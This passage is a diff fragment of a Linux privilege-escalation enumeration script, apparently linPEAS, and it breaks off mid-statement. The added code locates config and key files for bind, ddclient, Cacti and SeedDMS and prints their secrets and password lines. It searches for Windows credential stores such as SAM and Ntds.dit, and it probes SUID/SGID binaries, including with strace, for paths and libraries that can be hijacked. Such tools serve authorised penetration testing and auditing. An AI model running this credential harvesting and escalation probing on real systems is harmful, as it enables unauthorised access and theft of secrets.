grep -E \"bind$\"`" ]; then echo_not_found "bind"; fi; printf "%s" "$PSTORAGE_BIND" | grep -E "bind$" | while read f; do ls -ld "$f" | sed -${E} "s,bind$,${SED_RED},"; for ff in $(find "$f" -name "*"); do ls -ld "$ff" | sed -${E} "s,,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "*.key"); do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; + + + print_2title "Analyzing SeedDMS Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SEEDDMS\" | grep -E \"seeddms.*$\"`" ]; then echo_not_found "seeddms*"; fi; printf "%s" "$PSTORAGE_SEEDDMS" | grep -E "seeddms.*$" | while read f; do ls -ld "$f" | sed -${E} "s,seeddms.*$,${SED_RED},"; for ff in $(find "$f" -name "settings.xml"); do ls -ld "$ff" | sed -${E} "s,settings.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "=" | sed -${E} "s,[pP][aA][sS][sS],${SED_RED},g"; done; echo "";done; echo ""; + + + print_2title "Analyzing Ddclient Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_DDCLIENT\" | grep -E \"ddclient\.conf$\"`" ]; then echo_not_found "ddclient.conf"; fi; printf "%s" "$PSTORAGE_DDCLIENT" | grep -E "ddclient\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,ddclient\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*password.*,${SED_RED},g"; done; echo ""; + + + print_2title "Analyzing Cacti Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CACTI\" | grep -E \"cacti$\"`" ]; then echo_not_found "cacti"; fi; printf "%s" "$PSTORAGE_CACTI" | grep -E "cacti$" | while read f; do ls -ld "$f" | sed -${E} "s,cacti$,${SED_RED},"; for ff in $(find "$f" -name "config.php"); do ls -ld "$ff" | sed -${E} "s,config.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";for ff in $(find "$f" -name "config.php.dist"); do ls -ld "$ff" | sed -${E} "s,config.php.dist,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";for ff in $(find "$f" -name "installer.php"); do ls -ld "$ff" | sed -${E} "s,installer.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";for ff in $(find "$f" -name "check_all_pages"); do ls -ld "$ff" | sed -${E} "s,check_all_pages,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";done; echo ""; + + + + + print_2title "Analyzing Interesting logs Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"access\.log$\"`" ]; then echo_not_found "access.log"; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "access\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,access\.log$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"error\.log$\"`" ]; then echo_not_found "error.log"; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "error\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,error\.log$,${SED_RED},"; done; echo ""; + + + print_2title "Analyzing Windows Files Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattend\.inf$\"`" ]; then echo_not_found "unattend.inf"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattend\.inf$" | while read f; do ls -ld "$f" | sed -${E} "s,unattend\.inf$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"\.rdg$\"`" ]; then echo_not_found "*.rdg"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "\.rdg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.rdg$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"AppEvent\.Evt$\"`" ]; then echo_not_found "AppEvent.Evt"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "AppEvent\.Evt$" | while read f; do ls -ld "$f" | sed -${E} "s,AppEvent\.Evt$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"ConsoleHost_history\.txt$\"`" ]; then echo_not_found "ConsoleHost_history.txt"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "ConsoleHost_history\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,ConsoleHost_history\.txt$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"FreeSSHDservice\.ini$\"`" ]; then echo_not_found "FreeSSHDservice.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "FreeSSHDservice\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,FreeSSHDservice\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"NetSetup\.log$\"`" ]; then echo_not_found "NetSetup.log"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "NetSetup\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,NetSetup\.log$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"Ntds\.dit$\"`" ]; then echo_not_found "Ntds.dit"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "Ntds\.dit$" | while read f; do ls -ld "$f" | sed -${E} "s,Ntds\.dit$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"protecteduserkey\.bin$\"`" ]; then echo_not_found "protecteduserkey.bin"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "protecteduserkey\.bin$" | while read f; do ls -ld "$f" | sed -${E} "s,protecteduserkey\.bin$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"RDCMan\.settings$\"`" ]; then echo_not_found "RDCMan.settings"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "RDCMan\.settings$" | while read f; do ls -ld "$f" | sed -${E} "s,RDCMan\.settings$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"SAM$\"`" ]; then echo_not_found "SAM"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "SAM$" | while read f; do ls -ld "$f" | sed -${E} "s,SAM$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"SYSTEM$\"`" ]; then echo_not_found "SYSTEM"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "SYSTEM$" | while read f; do ls -ld "$f" | sed -${E} "s,SYSTEM$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"SecEvent\.Evt$\"`" ]; then echo_not_found "SecEvent.Evt"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "SecEvent\.Evt$" | while read f; do ls -ld "$f" | sed -${E} "s,SecEvent\.Evt$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"appcmd\.exe$\"`" ]; then echo_not_found "appcmd.exe"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "appcmd\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,appcmd\.exe$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"bash\.exe$\"`" ]; then echo_not_found "bash.exe"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "bash\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,bash\.exe$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"datasources\.xml$\"`" ]; then echo_not_found "datasources.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "datasources\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,datasources\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"default\.sav$\"`" ]; then echo_not_found "default.sav"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "default\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,default\.sav$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"drives\.xml$\"`" ]; then echo_not_found "drives.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "drives\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,drives\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"groups\.xml$\"`" ]; then echo_not_found "groups.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "groups\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,groups\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"https-xampp\.conf$\"`" ]; then echo_not_found "https-xampp.conf"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "https-xampp\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,https-xampp\.conf$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"https\.conf$\"`" ]; then echo_not_found "https.conf"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "https\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,https\.conf$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"iis6\.log$\"`" ]; then echo_not_found "iis6.log"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "iis6\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,iis6\.log$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"index\.dat$\"`" ]; then echo_not_found "index.dat"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "index\.dat$" | while read f; do ls -ld "$f" | sed -${E} "s,index\.dat$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"my\.cnf$\"`" ]; then echo_not_found "my.cnf"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "my\.cnf$" | while read f; do ls -ld "$f" | sed -${E} "s,my\.cnf$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"my\.ini$\"`" ]; then echo_not_found "my.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "my\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,my\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"ntuser\.dat$\"`" ]; then echo_not_found "ntuser.dat"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "ntuser\.dat$" | while read f; do ls -ld "$f" | sed -${E} "s,ntuser\.dat$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"pagefile\.sys$\"`" ]; then echo_not_found "pagefile.sys"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "pagefile\.sys$" | while read f; do ls -ld "$f" | sed -${E} "s,pagefile\.sys$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"php\.ini$\"`" ]; then echo_not_found "php.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "php\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,php\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"printers\.xml$\"`" ]; then echo_not_found "printers.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "printers\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,printers\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"recentservers\.xml$\"`" ]; then echo_not_found "recentservers.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "recentservers\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,recentservers\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"scclient\.exe$\"`" ]; then echo_not_found "scclient.exe"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "scclient\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,scclient\.exe$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"scheduledtasks\.xml$\"`" ]; then echo_not_found "scheduledtasks.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "scheduledtasks\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,scheduledtasks\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"security\.sav$\"`" ]; then echo_not_found "security.sav"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "security\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,security\.sav$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"server\.xml$\"`" ]; then echo_not_found "server.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "server\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,server\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"setupinfo$\"`" ]; then echo_not_found "setupinfo"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "setupinfo$" | while read f; do ls -ld "$f" | sed -${E} "s,setupinfo$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"setupinfo\.bak$\"`" ]; then echo_not_found "setupinfo.bak"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "setupinfo\.bak$" | while read f; do ls -ld "$f" | sed -${E} "s,setupinfo\.bak$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sitemanager\.xml$\"`" ]; then echo_not_found "sitemanager.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sitemanager\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,sitemanager\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sites\.ini$\"`" ]; then echo_not_found "sites.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sites\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,sites\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"software$\"`" ]; then echo_not_found "software"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "software$" | while read f; do ls -ld "$f" | sed -${E} "s,software$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"software\.sav$\"`" ]; then echo_not_found "software.sav"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "software\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,software\.sav$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sysprep\.inf$\"`" ]; then echo_not_found "sysprep.inf"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sysprep\.inf$" | while read f; do ls -ld "$f" | sed -${E} "s,sysprep\.inf$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sysprep\.xml$\"`" ]; then echo_not_found "sysprep.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sysprep\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,sysprep\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"system$\"`" ]; then echo_not_found "system"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "system$" | while read f; do ls -ld "$f" | sed -${E} "s,system$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"system\.sav$\"`" ]; then echo_not_found "system.sav"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "system\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,system\.sav$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattend\.txt$\"`" ]; then echo_not_found "unattend.txt"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattend\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,unattend\.txt$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattend\.xml$\"`" ]; then echo_not_found "unattend.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattend\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,unattend\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattended\.xml$\"`" ]; then echo_not_found "unattended.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattended\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,unattended\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"wcx_ftp\.ini$\"`" ]; then echo_not_found "wcx_ftp.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "wcx_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,wcx_ftp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"ws_ftp\.ini$\"`" ]; then echo_not_found "ws_ftp.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "ws_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ws_ftp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"web.*\.config$\"`" ]; then echo_not_found "web*.config"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "web.*\.config$" | while read f; do ls -ld "$f" | sed -${E} "s,web.*\.config$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"winscp\.ini$\"`" ]; then echo_not_found "winscp.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "winscp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,winscp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"wsl\.exe$\"`" ]; then echo_not_found "wsl.exe"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "wsl\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,wsl\.exe$,${SED_RED},"; done; echo ""; + + + print_2title "Analyzing Other Interesting Files Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.bashrc$\"`" ]; then echo_not_found ".bashrc"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.bashrc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.bashrc$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.google_authenticator$\"`" ]; then echo_not_found ".google_authenticator"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.google_authenticator$" | while read f; do ls -ld "$f" | sed -${E} "s,\.google_authenticator$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"hosts\.equiv$\"`" ]; then echo_not_found "hosts.equiv"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "hosts\.equiv$" | while read f; do ls -ld "$f" | sed -${E} "s,hosts\.equiv$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.lesshst$\"`" ]; then echo_not_found ".lesshst"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.lesshst$" | while read f; do ls -ld "$f" | sed -${E} "s,\.lesshst$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.plan$\"`" ]; then echo_not_found ".plan"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.plan$" | while read f; do ls -ld "$f" | sed -${E} "s,\.plan$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.profile$\"`" ]; then echo_not_found ".profile"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.profile$" | while read f; do ls -ld "$f" | sed -${E} "s,\.profile$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.recently-used\.xbel$\"`" ]; then echo_not_found ".recently-used.xbel"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.recently-used\.xbel$" | while read f; do ls -ld "$f" | sed -${E} "s,\.recently-used\.xbel$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.rhosts$\"`" ]; then echo_not_found ".rhosts"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.rhosts$" | while read f; do ls -ld "$f" | sed -${E} "s,\.rhosts$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.sudo_as_admin_successful$\"`" ]; then echo_not_found ".sudo_as_admin_successful"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.sudo_as_admin_successful$" | while read f; do ls -ld "$f" | sed -${E} "s,\.sudo_as_admin_successful$,${SED_RED},"; done; echo ""; + + + echo "" + + if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi +fi + + +if [ "`echo $CHECKS | grep IntFiles`" ]; then + ########################################### + #----------) Interesting files (----------# + ########################################### + print_title "Interesting Files" + + ##-- IF) SUID + print_2title "SUID - Check easy privesc, exploits and write perms" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" + if ! [ "$STRINGS" ]; then + echo_not_found "strings" + fi + if ! [ "$STRACE" ]; then + echo_not_found "strace" + fi + find / -perm -4000 -type f 2>/dev/null | xargs ls -lahtr | while read s; do + #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder + if [ "`echo \"$s\" | grep -E \"^total\"`" ]; then break; fi + + sname="`echo \"$s\" | awk '{print $9}'`" + if [ "$sname" = "." ] || [ "$sname" = ".." ]; then + true #Don't do nothing + elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then + echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + c="a" + for b in $sidB; do + if [ "`echo $s | grep $(echo $b | cut -d % -f 1)`" ]; then + echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," + c="" + break; + fi + done; + if [ "$c" ]; then + if [ "`echo \"$s\" | grep -E \"$sidG1\"`" ] || [ "`echo \"$s\" | grep -E \"$sidG2\"`" ] || [ "`echo \"$s\" | grep -E \"$sidG3\"`" ] || [ "`echo \"$s\" | grep -E \"$sidG4\"`" ] || [ "`echo \"$s\" | grep -E \"$sidVB\"`" ] || [ "`echo \"$s\" | grep -E \"$sidVB2\"`" ]; then + echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," + else + echo "$s (Unknown SUID binary)" | sed -${E} "s,/.*,${SED_RED}," + printf $ITALIC + if [ "$STRINGS" ]; then + $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do + sline_first="`echo \"$sline\" | cut -d ' ' -f1`" + if [ "`echo \"$sline_first\" | grep -Ev \"$cfuncs\"`" ]; then + if [ "`echo \"$sline_first\" | grep \"/\"`" ] && [ -f "$sline_first" ]; then #If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n" + fi + else #If not a path + if [ ${#sline_first} -gt 2 ] && [ "`command -v \"$sline_first\" 2>/dev/null | grep '/' `" ] && [ "`echo \"$sline_first\" | grep -v \"..\" `" ]; then #Check if existing binary + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n" + fi + fi + fi + done + if [ "$TIMEOUT" ] && [ "$STRACE" ] && ! [ "$NOTEXPORT" ] && [ -x "$sname" ]; then + printf $ITALIC + echo "----------------------------------------------------------------------------------------" + echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." + timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" + printf $NC + echo "----------------------------------------------------------------------------------------" + echo "" + fi + fi + fi + fi + fi + done; + echo "" + + + ##-- IF) SGID + print_2title "SGID" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" + find / -perm -2000 -type f 2>/dev/null | xargs ls -lahtr | while read s; do + #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder + if [ "`echo \"$s\" | grep -E \"^total\"`" ];then break; fi + + sname="`echo \"$s\" | awk '{print $9}'`" + if [ "$sname" = "." ] || [ "$sname" = ".." ]; then + true #Don't do nothing + elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then + echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + c="a" + for b in $sidB; do + if [ "`echo \"$s\" | grep $(echo \"$b\" | cut -d % -f 1)`" ]; then + echo "$s" | sed -${E} "s,$(echo \"$b\" | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," + c="" + break; + fi + done; + if [ "$c" ]; then + if [ "`echo \"$s\" | grep -E \"$sidG1\"`" ] || [ "`echo \"$s\" | grep -E \"$sidG2\"`" ] || [ "`echo \"$s\" | grep -E \"$sidG3\"`" ] || [ "`echo \"$s\" | grep -E \"$sidG4\"`" ] || [ "`echo \"$s\" | grep -E \"$sidVB\"`" ] || [ "`echo \"$s\" | grep -E \"$sidVB2\"`" ]; then + echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," + else + echo "$s 